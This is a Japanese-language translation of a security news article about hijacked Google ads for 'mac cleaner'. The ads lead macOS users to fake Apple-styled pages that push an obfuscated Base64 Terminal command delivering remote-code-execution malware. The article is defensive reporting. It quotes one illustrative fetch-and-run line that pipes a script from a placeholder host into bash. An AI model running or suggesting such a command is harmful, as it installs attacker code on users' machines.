サイバー犯罪者が「mac cleaner」の検索クエリ向けにGoogle検索広告を乗っ取り、macOSユーザーをAppleのデザインを模した偽サイトへ誘導しています。
これらのスポンサー結果は素早いストレージ修復をうたいながら、リモートコード実行(RCE)ペイロードを配布します。
セキュリティ研究者がこの手口を暴き、難読化されたコマンドがマルウェアを密かにダウンロードして実行することを明らかにしました。おそらく侵害されたGoogle広告アカウントが、この悪用を助長しています。
詐欺は一見無害に始まります。「mac cleaner」を検索したユーザーは、「Nathaniel Josue Rodriguez」や「Aloha Shirt Shop」といった一見正当な広告主からの上位スポンサーリンクを目にします。
クリックすると、Appleのサイトのように装飾されたGoogle Apps Scriptページ(script.google.com/macros)へ誘導され、機能しないナビゲーションメニューまで備えています。
偽の手順は、ターミナルコマンドで「ストレージを確認」したり「ディスク容量を解放」したりするようユーザーに促します。研究者は警告しています:実行しないでください。
「echo ‘macOSのストレージをクリーンアップ中…’」はユーザーの注意をそらし、日常的なメンテナンスを装います。本当の脅威はBase64エンコードの中に隠されています。
base64 -Dフラグがそれをデコードして、ユーザー権限でリモートスクリプトを取得・実行するシェルコマンドに変換します。実際のクリーンアップは行われず、RCEのための純粋なソーシャルエンジニアリングです。
これはcurl https://suspicious-site.com/script.sh | bashと同等ですが、検知を回避するために難読化されています。
サイレントフラグにより、被害者に警告するポップアップは表示されません。この手口は、偽のGitHub README、マルウェアインストーラー、サプライチェーン攻撃といった一般的な侵入経路に見られるものと一致します。
macOSのユーザーレベル実行の制限によりrootレベルの被害は抑えられますが、それでもデータ窃取や、ユーザーが書き込み可能なパスを介した永続化のリスクがあります。
MacKeeperによると、研究者は広告がdocs.google.comのプレビューのような信頼できそうなドメインからこれらのスクリプトへリダイレクトすることを確認しました。直接結び付くCVEはありませんが、GoogleとAppleのブランドに対するユーザーの信頼を悪用しています。
広告主プロフィールには危険信号が見られます。「Nathaniel Josue Rodriguez」(Google Transparency ID: AR03742598973764927489)は他の場所では無害な広告を運用しています。
「Aloha Shirt Shop」(AR00152784596742701057)には不審なエントリが1件見られます。侵害されたアカウントが原因である可能性が高く、認証済み広告主が優先的に広告枠を得られるため、到達範囲が拡大します。
このマルバタイジングの波は、増大するストレージ需要の中でディスククリーンアップを求めるmacOSユーザーを狙っています。以前にはWindowsの「PC最適化ツール」でも同様の詐欺が発生しました。
翻訳元: https://cyberpress.org/malicious-mac-cleaner-ads-scam/